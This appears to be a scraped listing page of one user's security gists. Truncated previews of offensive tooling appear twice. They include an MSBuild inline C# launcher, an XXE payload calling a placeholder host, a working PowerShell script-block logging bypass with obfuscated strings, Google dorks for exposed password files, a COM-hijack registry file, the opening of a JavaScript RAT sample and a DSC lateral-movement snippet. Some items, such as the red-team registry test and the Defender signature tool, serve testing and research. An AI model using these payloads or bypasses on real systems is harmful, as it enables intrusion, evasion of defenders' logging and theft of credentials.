Robert rmusser01

## ssh-fingerprints.csv

          
            dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0
            245272

            
              32:f9:38:a2:39:d0:c5:f5:ba:bd:b7:75:2b:00:f6:ab
              197846

            
              d0:db:8a:cb:74:c8:37:e4:9e:71:fc:7a:eb:d6:40:81
              152046

            
              34:47:0f:e9:1a:c2:eb:56:eb:cc:58:59:3a:02:80:b6
              140777

            
              df:17:d6:57:7a:37:00:7a:87:5e:4e:ed:2f:a3:d5:dd
              91904

            
              81:96:a6:8c:3a:75:f3:be:84:5e:cc:99:a7:ab:3e:d9
              80499

            
              7c:a8:25:21:13:a2:eb:00:a6:c1:76:ca:6b:48:6e:bf
              78172

            
              1c:1e:29:43:d2:0c:c1:75:40:05:30:03:d4:02:d7:9b
              71851

            
              8b:75:88:08:41:78:11:5b:49:68:11:42:64:12:6d:49
              70786

            
              c2:77:c8:c5:72:17:e2:5b:4f:a2:4e:e3:04:0c:35:c9
              68654

## katz.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
  <Target Name="Hello">
    <SharpLauncher >
    </SharpLauncher>
  </Target>
  <UsingTask
    TaskName="SharpLauncher"
    TaskFactory="CodeTaskFactory"

## curl reference
==========================================
             CURL COMMAND
==========================================

Format       curl [options] [URL...]

Quick Ref:

   curl -X POST http://example.com/   <= Method option and URL (Options come before or after URL)
        -H "Authorization: <data>"    <= Add HTTP Header (like Authorization)

## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## ScriptBlockLogBypass.ps1
# ScriptBlock Logging Bypass
# @cobbr_io

$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
    $GroupPolicyCache = $GroupPolicyField.GetValue($null)
    If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
    }

## GoogleHackMasterList.txt
admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www&#8221; domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"parent directory" +proftpdpasswd
Duclassified" -site:duware.com "DUware All Rights reserved"
duclassmate" -site:duware.com

## winlogon.reg
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]

## JavaScript RAT
## uploaded by @JohnLaTwC
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde
<html>
<head>
<script language="JScript">
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();

try

## PowerShellDSCLateralMovement.ps1
# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/

<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
    ResourceID = "[Script]ScriptExample";
    GetScript = "\"$(Get-Date): I am being GET\"     | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
    TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";

## ExpandDefenderSig.ps1
filter Expand-DefenderAVSignatureDB {
<#
.SYNOPSIS

Decompresses a Windows Defender AV signature database (.VDM file).

.DESCRIPTION

Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project (https://github.com/taviso/loadlibrary). Note: Currently, "scrambled" databases are not supported although, I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed.
	dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0	245272
	32:f9:38:a2:39:d0:c5:f5:ba:bd:b7:75:2b:00:f6:ab	197846
	d0:db:8a:cb:74:c8:37:e4:9e:71:fc:7a:eb:d6:40:81	152046
	34:47:0f:e9:1a:c2:eb:56:eb:cc:58:59:3a:02:80:b6	140777
	df:17:d6:57:7a:37:00:7a:87:5e:4e:ed:2f:a3:d5:dd	91904
	81:96:a6:8c:3a:75:f3:be:84:5e:cc:99:a7:ab:3e:d9	80499
	7c:a8:25:21:13:a2:eb:00:a6:c1:76:ca:6b:48:6e:bf	78172
	1c:1e:29:43:d2:0c:c1:75:40:05:30:03:d4:02:d7:9b	71851
	8b:75:88:08:41:78:11:5b:49:68:11:42:64:12:6d:49	70786
	c2:77:c8:c5:72:17:e2:5b:4f:a2:4e:e3:04:0c:35:c9	68654
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes c# code. -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
	<Target Name="Hello">
	<SharpLauncher >
	</SharpLauncher>
	</Target>
	<UsingTask
	TaskName="SharpLauncher"
	TaskFactory="CodeTaskFactory"
	==========================================
	CURL COMMAND
	==========================================

	Format curl [options] [URL...]

	Quick Ref:

	curl -X POST http://example.com/ <= Method option and URL (Options come before or after URL)
	-H "Authorization: <data>" <= Add HTTP Header (like Authorization)
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	# ScriptBlock Logging Bypass
	# @cobbr_io

	$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
	If ($GroupPolicyField) {
	$GroupPolicyCache = $GroupPolicyField.GetValue($null)
	If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
	}
	admin account info" filetype:log
	!Host=. intext:enc_UserPassword=* ext:pcf
	"# -FrontPage-" ext:pwd inurl:(service \| authors \| administrators \| users) "# -FrontPage-" inurl:service.pwd
	"AutoCreate=TRUE password=*"
	"http://:@www” domainname
	"index of/" "ws_ftp.ini" "parent directory"
	"liveice configuration file" ext:cfg -site:sourceforge.net
	"parent directory" +proftpdpasswd
	Duclassified" -site:duware.com "DUware All Rights reserved"
	duclassmate" -site:duware.com
	Windows Registry Editor Version 5.00
	[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
	@="AtomicRedTeam"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
	@="{00000001-0000-0000-0000-0000FEEDACDC}"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
	@="AtomicRedTeam"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
	@="{00000001-0000-0000-0000-0000FEEDACDC}"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
	## uploaded by @JohnLaTwC
	## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde
	<html>
	<head>
	<script language="JScript">
	window.resizeTo(1, 1);
	window.moveTo(-2000, -2000);
	window.blur();

	try
	# This idea originated from this blog post on Invoke DSC Resources directly:
	# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/

	<#
	$MOFContents = @'
	instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
	{
	ResourceID = "[Script]ScriptExample";
	GetScript = "\"$(Get-Date): I am being GET\" \| Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
	TestScript = "\"$(Get-Date): I am being TESTED\" \| Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
	filter Expand-DefenderAVSignatureDB {
	<#
	.SYNOPSIS

	Decompresses a Windows Defender AV signature database (.VDM file).

	.DESCRIPTION

	Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project (https://github.com/taviso/loadlibrary). Note: Currently, "scrambled" databases are not supported although, I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed.